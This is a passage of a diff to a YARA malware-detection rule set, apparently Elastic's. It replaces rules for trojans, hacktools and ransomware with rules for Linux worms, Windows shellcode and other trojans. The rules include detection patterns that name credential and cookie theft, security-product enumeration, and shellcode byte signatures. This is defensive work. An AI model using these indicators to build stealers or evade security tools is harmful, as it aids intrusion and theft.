"Windows.VulnDriver.MtcBsv" - severity = 50 + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Worm_Generic.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "87507f5cd73fffdb264d76db9b75f30fe21cc113bcf82c524c5386b5a380d4bb" + logic_hash = "c1a130d2ef8d09cb28adc4e347cbd1a083c78241752ecf3f935b03d774d00a81" + score = 60 + quality = 25 + tags = "FILE, MEMORY" + fingerprint = "d6cec73bb6093dbc6d26566c174d0d0f6448f431429edef0528c9ec1c83177fa" + severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $original_file_name = { 4F 00 72 00 69 00 67 00 69 00 6E 00 61 00 6C 00 46 00 69 00 6C 00 65 00 6E 00 61 00 6D 00 65 00 00 00 6D 00 74 00 63 00 42 00 53 00 76 00 36 00 34 00 2E 00 73 00 79 00 73 00 00 00 } - $version = /V\x00S\x00_\x00V\x00E\x00R\x00S\x00I\x00O\x00N\x00_\x00I\x00N\x00F\x00O\x00\x00\x00{0,4}\xbd\x04\xef\xfe[\x00-\xff]{4}(([\x00-\x02][\x00-\x00])([\x00-\x15][\x00-\x00])([\x00-\x00][\x00-\x00])([\x00-\x00][\x00-\x00])|([\x00-\xff][\x00-\xff])([\x00-\x14][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff])|([\x00-\x01][\x00-\x00])([\x00-\x15][\x00-\x00])([\x00-\xff][\x00-\xff])([\x00-\xff][\x00-\xff]))/ + $a = { 24 14 75 E1 8B 5A 24 01 EB 66 8B 0C 4B 8B 5A 1C 01 EB 8B 04 8B } condition: - int16 ( uint32(0x3C)+0x5c)==0x0001 and $original_file_name and $version + all of them } -rule ELASTIC_Windows_Trojan_Bandook_38497690 : FILE MEMORY +rule ELASTIC_Linux_Worm_Generic_Bd64472E : FILE MEMORY { meta: - description = "Detects Windows Trojan Bandook (Windows.Trojan.Bandook)" + description = "Detects Linux Worm Generic (Linux.Worm.Generic)" author = "Elastic Security" - id = "38497690-6663-47c9-a864-0bbe6a3f7a8b" - date = "2022-08-10" - modified = "2022-09-29" + id = "bd64472e-92a2-4d64-8008-b82d7ca33b1d" + date = "2021-04-06" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Bandook.yar#L1-L24" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "4d079586a51168aac708a9ab7d11a5a49dfe7a16d9ced852fbbc5884020c0c97" - logic_hash = "199614993f63636764808313f25199348afdf4d537c8dca06f673559e34636b8" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Worm_Generic.yar#L41-L59" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "b3334a3b61b1a3fc14763dc3d590100ed5e85a97493c89b499b02b76f7a0a7d0" + logic_hash = "9a7267a0ebc1073d0b1f81a61b963642cc816b563b43ff4d9508dd8bc195a0e1" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "b6debea805a8952b9b7473ad7347645e4aced3ecde8d6e53fa2d82c35b285b3c" + fingerprint = "1978baa7ff5457e06433fd45db098aefd39ea53d3f29e541eef54890a25a9dce" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $str1 = "%s~!%s~!%s~!%s~!%s~!%s~!" - $str2 = "ammyy.abc" - $str3 = "StealUSB" - $str4 = "DisableMouseCapture" - $str5 = "%sSkype\\%s\\config.xml" - $str6 = "AVE_MARIA" + $a = { 89 C0 89 45 EC 83 7D EC FF 75 38 68 54 90 04 08 } condition: - 3 of them + all of them } -rule ELASTIC_Windows_Hacktool_Sharpchromium_41Ce5080 : FILE MEMORY +rule ELASTIC_Linux_Worm_Generic_3Ff8F75B : FILE MEMORY { meta: - description = "Detects Windows Hacktool Sharpchromium (Windows.Hacktool.SharpChromium)" + description = "Detects Linux Worm Generic (Linux.Worm.Generic)" author = "Elastic Security" - id = "41ce5080-7d84-4a56-8de8-86959eb92057" - date = "2022-11-20" - modified = "2023-01-11" + id = "3ff8f75b-619e-4090-8ea4-aedc8bdf61a4" + date = "2021-01-12" + modified = "2021-09-16" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_SharpChromium.yar#L1-L23" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "9dd65aa53728d51f0f3b9aaf51a24f8a2c3f84b4a4024245575975cf9ad7f2e5" - logic_hash = "50972a6e6af1d7076243320fb6559193e0c46ac1300aa62d12390fdeb2fffdcd" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Worm_Generic.yar#L61-L79" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "991175a96b719982f3a846df4a66161a02225c21b12a879e233e19124e90bd35" + logic_hash = "798e98f286201f1cda18bf1bf433826cf8a949b584f016b24a684425069d1024" score = 75 - quality = 48 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "b6695ded1a6f647812c7f355e089a2ed7209ac59f51a97d8f6b1897bb1e7d9ad" + fingerprint = "011f0cd72ebb428775305c84eac69c5ff4800de6e1d8b4d2110d5445b1aae10f" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $guid = "F1653F20-D47D-4F29-8C55-3C835542AF5F" ascii wide nocase - $print_str0 = "[X] Exception occurred while writing cookies to file: {0}" ascii wide fullword - $print_str1 = "[*] All cookies written to {0}" ascii wide fullword - $print_str2 = "\\{0}-cookies.json" ascii wide fullword - $print_str3 = "[*] {0} {1} extraction." ascii wide fullword + $a = { 3A DF FE 00 66 0F 73 FB 04 66 0F 6F D3 66 0F EF D9 66 0F 6F EE 66 0F 70 } condition: - $guid or all of ($print_str*) + all of them } -rule ELASTIC_Macos_Hacktool_Swiftbelt_Bc62Ede6 : FILE MEMORY +rule ELASTIC_Macos_Trojan_Generic_A829D361 : FILE MEMORY { meta: - description = "Detects Macos Hacktool Swiftbelt (MacOS.Hacktool.Swiftbelt)" + description = "Detects Macos Trojan Generic (MacOS.Trojan.Generic)" author = "Elastic Security" - id = "bc62ede6-e6f1-4c9e-bff2-ef55a5d12ba1" - date = "2021-10-12" + id = "a829d361-ac57-4615-b8e9-16089c44d7af" + date = "2021-10-05" modified = "2021-10-25" - reference = "https://www.elastic.co/security-labs/inital-research-of-jokerspy" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/MacOS_Hacktool_Swiftbelt.yar#L1-L44" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "452c832a17436f61ad5f32ee1c97db05575160105ed1dcd0d3c6db9fb5a9aea1" - logic_hash = "51481baa6ddb09cf8463d989637319cb26b23fef625cc1a44c96d438c77362ca" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/MacOS_Trojan_Generic.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "5b2a1cd801ae68a890b40dbd1601cdfeb5085574637ae8658417d0975be8acb5" + logic_hash = "70a954e8b44b1ce46f5ce0ebcf43b46e1292f0b8cdb46aa67f980d3c9b0a6f61" score = 75 - quality = 73 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "98d14dba562ad68c8ecc00780ab7ee2ecbe912cd00603fff0eb887df1cd12fdb" + fingerprint = "5dba43dbc5f4d5ee295e65d66dd4e7adbdb7953232faf630b602e6d093f69584" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -69693,145 +70000,112 @@ rule ELASTIC_Macos_Hacktool_Swiftbelt_Bc62Ede6 : FILE MEMORY os = "macos" strings: - $dbg1 = "SwiftBelt/Sources/SwiftBelt" - $dbg2 = "[-] Firefox places.sqlite database not found for user" - $dbg3 = "[-] No security products found" - $dbg4 = "SSH/AWS/gcloud Credentials Search:" - $dbg5 = "[-] Could not open the Slack Cookies database" - $sec1 = "[+] Malwarebytes A/V found on this host" - $sec2 = "[+] Cisco AMP for endpoints found" - $sec3 = "[+] SentinelOne agent running" - $sec4 = "[+] Crowdstrike Falcon agent found" - $sec5 = "[+] FireEye HX agent installed" - $sec6 = "[+] Little snitch firewall found" - $sec7 = "[+] ESET A/V installed" - $sec8 = "[+] Carbon Black OSX Sensor installed" - $sec9 = "/Library/Little Snitch" - $sec10 = "/Library/FireEye/xagt" - $sec11 = "/Library/CS/falcond" - $sec12 = "/Library/Logs/PaloAltoNetworks/GlobalProtect" - $sec13 = "/Library/Application Support/Malwarebytes" - $sec14 = "/usr/local/bin/osqueryi" - $sec15 = "/Library/Sophos Anti-Virus" - $sec16 = "/Library/Objective-See/Lulu" - $sec17 = "com.eset.remoteadministrator.agent" - $sec18 = "/Applications/CarbonBlack/CbOsxSensorService" - $sec19 = "/Applications/BlockBlock Helper.app" - $sec20 = "/Applications/KextViewr.app" + $a = { E7 81 6A 12 EA A8 56 6C 86 94 ED F6 E8 D7 35 E1 EC 65 47 BA 8E 46 2C A6 14 5F } condition: - 6 of them + all of them } -rule ELASTIC_Windows_Hacktool_EDRWFP_F6D7Db7A : FILE +rule ELASTIC_Windows_Shellcode_Generic_8C487E57 : FILE MEMORY { meta: - description = "Detects Windows Hacktool Edrwfp (Windows.Hacktool.EDRWFP)" + description = "Detects Windows Shellcode Generic (Windows.Shellcode.Generic)" author = "Elastic Security" - id = "f6d7db7a-c55e-41dc-859b-6431464e72f4" - date = "2024-06-10" - modified = "2024-07-02" + id = "8c487e57-4b8c-488e-a1d9-786ff935fd2c" + date = "2022-05-23" + modified = "2022-07-18" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Hacktool_EDRWFP.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a1fc2f3ded852f75e36e70ae39087e21ae5b6af10e2038d04e61bd500ba511e2" - logic_hash = "45d427e4f52346b4a18c154bb0afb636c18951fd9c7323846bf2eb7e47928ef6" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Shellcode_Generic.yar#L1-L18" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "a86ea8e15248e83ce7322c10e308a5a24096b1d7c67f5673687563dec8229dfe" score = 75 quality = 75 - tags = "FILE" - fingerprint = "11e4224f53ddb5ef18aef5efeaa7ec6ec00072e57db5189e29a04feae6b3da31" + tags = "FILE, MEMORY" + fingerprint = "834caf96192a513aa93ac48fb8d2f3326bf9f08acaf7a27659f688b26e3e57e4" severity = 100 arch_context = "x86" - scan_context = "file" + scan_context = "file, memory" license = "Elastic License v2" os = "windows" strings: - $s1 = "elastic-endpoint.exe" - $s2 = "elastic-agent.exe" - $s3 = "MsMpEng.exe" - $s4 = "FwpmFilterAdd0" + $a = { FC E8 89 00 00 00 60 89 E5 31 D2 64 8B 52 30 8B 52 0C 8B 52 14 8B 72 28 0F B7 4A 26 31 FF 31 C0 } condition: all of them } -rule ELASTIC_Linux_Virus_Rst_1214E2Ae : FILE MEMORY +rule ELASTIC_Windows_Shellcode_Generic_F27D7Beb : FILE MEMORY { meta: - description = "Detects Linux Virus Rst (Linux.Virus.Rst)" + description = "Detects Windows Shellcode Generic (Windows.Shellcode.Generic)" author = "Elastic Security" - id = "1214e2ae-90e4-425e-b47f-0a0981623236" - date = "2021-04-06" - modified = "2021-09-16" + id = "f27d7beb-5ce0-4831-b1ad-320b346612c3" + date = "2022-06-08" + modified = "2022-09-29" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Virus_Rst.yar#L1-L19" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "b0e4f44d2456960bb6b20cb468c4ca1390338b83774b7af783c3d03e49eebe44" - logic_hash = "82de4a97f414d591daba2d5d49b941ec4c51d6a6af36f97f062eaac5c74ebe30" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Shellcode_Generic.yar#L20-L37" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "8530a74a002d0286711cd86545aff0bf853de6b6684473b6211d678797c3639f" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "a13a9825815a417be991db57f80dac4d0c541e303e4a4e6bd03c46ece73703ea" + fingerprint = "3f8dd6733091ec229e1bebe9e4cd370ad47ab2e3678be4c2d9c450df731a6e5c" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a = { 00 00 00 53 89 F3 CD 80 5B 58 5F 5E 5A 59 5B C3 } + $a = { 53 48 89 E3 66 83 E4 00 48 B9 [8] BA 01 00 00 00 41 B8 00 00 00 00 48 B8 [8] FF D0 48 89 DC 5B C3 } condition: all of them } -rule ELASTIC_Linux_Ransomware_Limpdemon_95C748E0 : FILE MEMORY +rule ELASTIC_Windows_Shellcode_Generic_29Dcbf7A : FILE MEMORY { meta: - description = "Detects Linux Ransomware Limpdemon (Linux.Ransomware.LimpDemon)" + description = "Detects Windows Shellcode Generic (Windows.Shellcode.Generic)" author = "Elastic Security" - id = "95c748e0-e2f5-4997-a69d-dbc8885e6f18" - date = "2023-07-27" - modified = "2024-02-13" + id = "29dcbf7a-2d3b-4e05-a2be-15623bf62d06" + date = "2023-05-09" + modified = "2023-06-13" reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Linux_Ransomware_LimpDemon.yar#L1-L22" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "a4200e90a821a2f2eb3056872f06cf5b057be154dcc410274955b2aaca831651" - logic_hash = "e66906725c0af657d91771642908ac0b2c72a97c4d4f651dcc907c2c1437f2da" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Shellcode_Generic.yar#L39-L56" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + logic_hash = "c2a81cc27e696a2e488df7d2f96784bbaed83df5783efab312fc5ccbfd524b43" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "20527c2e0d2e577c17da7184193ba372027cedb075f78bb75aff9d218c2d660b" + fingerprint = "e4664ec7bf7dab3fff873fe4b059e97d2defe3b50e540b96dd98481638dcdcd8" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "linux" + os = "windows" strings: - $a1 = "[-] You have to pass access key to start process" fullword - $a2 = "[+] Shutting down VMWare ESXi servers..." fullword - $a3 = "%s --daemon (start as a service)" fullword - $a4 = "%s --access-key (key for decryption config)" fullword + $a1 = { FC 48 83 E4 F0 41 57 41 56 41 55 41 54 55 53 56 57 48 83 EC 40 48 83 EC 40 48 83 EC 40 48 89 E3 } condition: - 2 of them + all of them } -rule ELASTIC_Windows_Trojan_Xworm_732E6C12 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Spectralviper_43Abeeeb : FILE MEMORY { meta: - description = "Detects Windows Trojan Xworm (Windows.Trojan.Xworm)" + description = "Detects Windows Trojan Spectralviper (Windows.Trojan.SpectralViper)" author = "Elastic Security" - id = "732e6c12-9ee0-4d04-a6e4-9eef874e2716" - date = "2023-04-03" - modified = "2023-04-23" - reference = "https://github.com/elastic/protections-artifacts/" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_Xworm.yar#L1-L25" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "bf5ea8d5fd573abb86de0f27e64df194e7f9efbaadd5063dee8ff9c5c3baeaa2" - logic_hash = "6aa72029eeeb2edd2472bf0db80b9c0ae4033d7d977cbee75ac94414d1cdff7a" + id = "43abeeeb-d81a-475e-9b9e-6b6337bf2ce0" + date = "2023-04-13" + modified = "2023-05-26" + reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SpectralViper.yar#L1-L27" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "7e35ba39c2c77775b0394712f89679308d1a4577b6e5d0387835ac6c06e556cb" + logic_hash = "976e5b5b4ba73f1b392c2f6b32a86b09b5fd9e5a3510c60b77a39f1e0d705822" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "afbef8e590105e16bbd87bd726f4a3391cd6a4489f7a4255ba78a3af761ad2f0" + fingerprint = "0e19e57e936d08f68c5580d21c2d69d451cfc11d413c6125dbdaab863b73d5c7" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -69839,34 +70113,35 @@ rule ELASTIC_Windows_Trojan_Xworm_732E6C12 : FILE MEMORY os = "windows" strings: - $str1 = "startsp" ascii wide fullword - $str2 = "injRun" ascii wide fullword - $str3 = "getinfo" ascii wide fullword - $str4 = "Xinfo" ascii wide fullword - $str5 = "openhide" ascii wide fullword - $str6 = "WScript.Shell" ascii wide fullword - $str7 = "hidefolderfile" ascii wide fullword + $a1 = { 13 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 26 83 FD 0A 0F 9C 44 24 27 4D 89 CE 4C 89 C7 48 89 D3 48 89 CE B8 } + $a2 = { 15 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 2E 83 FD 0A 0F 9C 44 24 2F 4D 89 CE 4C 89 C7 48 89 D3 48 89 CE B8 } + $a3 = { 00 8D 68 FF 0F AF E8 40 F6 C5 01 0F 94 44 24 2E 83 FA 0A 0F 9C 44 24 2F 4C 89 CE 4C 89 C7 48 89 CB B8 } + $a4 = { 00 48 89 C6 0F 29 30 0F 29 70 10 0F 29 70 20 0F 29 70 30 0F 29 70 40 0F 29 70 50 48 C7 40 60 00 00 00 00 48 89 C1 E8 } + $a5 = { 41 0F 45 C0 45 84 C9 41 0F 45 C0 EB BA 48 89 4C 24 08 89 D0 EB B1 48 8B 44 24 08 48 83 C4 10 C3 56 57 53 48 83 EC 30 8B 05 } + $a6 = { 00 8D 70 FF 0F AF F0 40 F6 C6 01 0F 94 44 24 25 83 FF 0A 0F 9C 44 24 26 89 D3 48 89 CF 48 } + $a7 = { 48 89 CE 48 89 11 4C 89 41 08 41 0F 10 01 41 0F 10 49 10 41 0F 10 51 20 0F 11 41 10 0F 11 49 20 0F 11 51 30 } + $a8 = { 00 8D 58 FF 0F AF D8 F6 C3 01 0F 94 44 24 22 83 FD 0A 0F 9C 44 24 23 48 89 D6 48 89 CF 4C 8D } condition: - all of them + 5 of them } -rule ELASTIC_Windows_Trojan_Siestagraph_8C36Ddc1 : FILE MEMORY +rule ELASTIC_Windows_Trojan_Spectralviper_368C36A0 : FILE MEMORY { meta: - description = "Detects Windows Trojan Siestagraph (Windows.Trojan.SiestaGraph)" + description = "Detects Windows Trojan Spectralviper (Windows.Trojan.SpectralViper)" author = "Elastic Security" - id = "8c36ddc1-c7fa-4c25-a05c-59c29e4e7c31" - date = "2022-12-14" - modified = "2022-12-15" - reference = "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SiestaGraph.yar#L1-L28" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "50c2f1bb99d742d8ae0ad7c049362b0e62d2d219b610dcf25ba50c303ccfef54" - logic_hash = "17ce8090b88100f00c07df0599cd51dc7682f4c43de989ce58621df97eca42fb" + id = "368c36a0-d8ec-4cd6-92b3-193907898dc1" + date = "2023-05-10" + modified = "2023-05-10" + reference = "https://www.elastic.co/security-labs/elastic-charms-spectralviper" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Windows_Trojan_SpectralViper.yar#L29-L53" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "d1c32176b46ce171dbce46493eb3c5312db134b0a3cfa266071555c704e6cff8" + logic_hash = "6182bde93e18dc6a83a94b50b193f5f29ed9abfa89b53c290818e7dab5bbb334" score = 75 - quality = 71 + quality = 75 tags = "FILE, MEMORY" - fingerprint = "a76d2b45261da65215797a4792a3aae5051d88ba15d01b24487c83d6a38b9ff7" + fingerprint = "cfe4df5390a625d59f1c30775fe26119707a296feb1a205f3df734a4c0fcc25c" severity = 100 arch_context = "x86" scan_context = "file, memory" @@ -69874,102 +70149,91 @@ rule ELASTIC_Windows_Trojan_Siestagraph_8C36Ddc1 : FILE MEMORY os = "windows" strings: - $a1 = "downloadAsync" ascii nocase fullword - $a2 = "UploadxAsync" ascii nocase fullword - $a3 = "GetAllDriveRootChildren" ascii fullword - $a4 = "GetDriveRoot" ascii fullword - $a5 = "sendsession" wide fullword - $b1 = "ListDrives" wide fullword - $b2 = "Del OK" wide fullword - $b3 = "createEmailDraft" ascii fullword - $b4 = "delMail" ascii fullword + $a1 = { 18 48 89 4F D8 0F 10 40 20 0F 11 47 E0 0F 10 40 30 0F 11 47 F0 48 8D } + $a2 = { 24 27 48 83 C4 28 5B 5D 5F 5E C3 56 57 53 48 83 EC 20 48 89 CE 48 } + $a3 = { C7 84 C9 0F 45 C7 EB 86 48 8B 44 24 28 48 83 C4 30 5B 5F 5E C3 48 83 } + $s1 = { 40 53 48 83 EC 20 48 8B 01 48 8B D9 48 8B 51 10 48 8B 49 08 FF D0 48 89 43 18 B8 04 00 00 } + $s2 = { 40 53 48 83 EC 20 48 8B 01 48 8B D9 48 8B 49 08 FF D0 48 89 43 10 B8 04 00 00 00 48 83 C4 20 5B } + $s3 = { 48 83 EC 28 4C 8B 41 18 4C 8B C9 48 B8 AB AA AA AA AA AA AA AA 48 F7 61 10 48 8B 49 08 48 C1 EA } condition: - all of ($a*) and 2 of ($b*) + 2 of ($a*) or any of ($s*) } -rule ELASTIC_Windows_Trojan_Siestagraph_Ad3Fe5C6 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Swrort_5Ad1A4F9 : FILE MEMORY { meta: - description = "Detects Windows Trojan Siestagraph (Windows.Trojan.SiestaGraph)" + description = "Detects Linux Trojan Swrort (Linux.Trojan.Swrort)" author = "Elastic Security" - id = "ad3fe5c6-88ba-46cf-aefd-bd8ab0eff917" - date = "2023-09-12" - modified = "2023-09-20" - reference = "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SiestaGraph.yar#L30-L56" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb" - logic_hash = "b625221b77803c2c052db09c90a76666cf9e0ae34cb0d59ae303e890e646e94b" + id = "5ad1a4f9-bfe5-4e5f-94e9-4983c93a1c1f" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Swrort.yar#L1-L19" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "fa5695c355a6dc1f368a4b36a45e8f18958dacdbe0eac80c618fbec976bac8fe" + logic_hash = "3a1fa978e0c8ab0dd4e7965a3f91306d6123c19f21b86d3f8088979bf58c3a07" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "653ca92d31c7212c1f154c2e18b3be095e9a39fe482ce99fbd84e19f4bf6ca64" + fingerprint = "a91458dd4bcd082506c554ca8479e1b0d23598e0e9a0e44ae1afb2651ce38dce" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $a1 = "GetAllDriveRootChildren" ascii fullword - $a2 = "GetDriveRoot" ascii fullword - $a3 = "sendsession" wide fullword - $b1 = "status OK" wide fullword - $b2 = "upload failed" wide fullword - $b3 = "Failed to fetch file" wide fullword - $c1 = "Specified file doesn't exist" wide fullword - $c2 = "file does not exist" wide fullword + $a = { 53 57 68 B7 E9 38 FF FF D5 53 53 57 68 74 EC 3B E1 FF D5 57 } condition: - 6 of them + all of them } -rule ELASTIC_Windows_Trojan_Siestagraph_D801Ce71 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Swrort_4Cb5B116 : FILE MEMORY { meta: - description = "Detects Windows Trojan Siestagraph (Windows.Trojan.SiestaGraph)" + description = "Detects Linux Trojan Swrort (Linux.Trojan.Swrort)" author = "Elastic Security" - id = "d801ce71-2e3d-47bb-a194-c68b437d8ecc" - date = "2023-09-12" - modified = "2023-09-20" - reference = "https://www.elastic.co/security-labs/siestagraph-new-implant-uncovered-in-asean-member-foreign-ministry" - source_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/yara/rules/Windows_Trojan_SiestaGraph.yar#L58-L79" - license_url = "https://github.com/elastic/protections-artifacts//blob/ea2f8dd3b61a7cdf2ce83ca5f06f2096bb62a494/LICENSE.txt" - hash = "fe8f99445ad139160a47b109a8f3291eef9c6a23b4869c48d341380d608ed4cb" - logic_hash = "c2d00d64d69cb5d24d76f6c551b49aa1acef1e1bab96f7ed7facc148244a8370" + id = "4cb5b116-5e90-4e5f-a62f-bfe616cab5db" + date = "2021-01-12" + modified = "2021-09-16" + reference = "https://github.com/elastic/protections-artifacts/" + source_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/yara/rules/Linux_Trojan_Swrort.yar#L21-L39" + license_url = "https://github.com/elastic/protections-artifacts//blob/d59600196a2d19f5ac8e25b603e811946eebe1d1/LICENSE.txt" + hash = "703c16d4fcc6f815f540d50d8408ea00b4cf8060cc5f6f3ba21be047e32758e0" + logic_hash = "9404856fc3290f3a8f9bf891fde9a614fc4484719eb3b51ce7ab601a41e0c3a5" score = 75 quality = 75 tags = "FILE, MEMORY" - fingerprint = "8e1d95313526650c2fa3dd00e779aec0e62d1a2273722ad913100eab003fc8b6" + fingerprint = "cb783f69b4074264a75894dd85459529a172404a6901a1f5753a2f9197bfca58" severity = 100 arch_context = "x86" scan_context = "file, memory" license = "Elastic License v2" - os = "windows" + os = "linux" strings: - $hashgenfunc = { 02 2C ?? 20 [4] 0A 16 0B 2B ?? 02 07 6F [4] 06 61 20 [4] 5A 0A 07 17 58 0B 07 02 6F [4] 32 ?? } - $sendpostfunc = { 72 [4] 72 [4] 72 [4] 02 73 [4] 73 [4] 28 [4] 0A 72 [4] 72 [4] 06 28 [4] 2A } - $command15 = { 25 16 1F 3A 9D 6F [4] 17 9A 13 ?? 11 ?? 28 [4] 13 ?? 11 ?? 28 [4] 11 ?? 28 [4] 2C 33 28 [4] 28 [4] 6F [4] 6F [4] 11 ?? 28 [4] 09 7B [4] 18 9A 72 [4] 72 [4] 28 [4] 26 DE } + $a = { 6A 00 6A 00 6A 00 6A 00 6A 00 6A 00 6A 04 6A 10 89 E1 6A 00 } condition: all of them } -rule ELASTIC_Linux_Trojan_Setag_351Eeb76 : FILE MEMORY +rule ELASTIC_Linux_Trojan_Swrort_22C2D6B6 : FILE MEMORY { meta: - description = "Detects Linux Trojan Setag (Linux.Trojan.Setag)" + description = "Detects 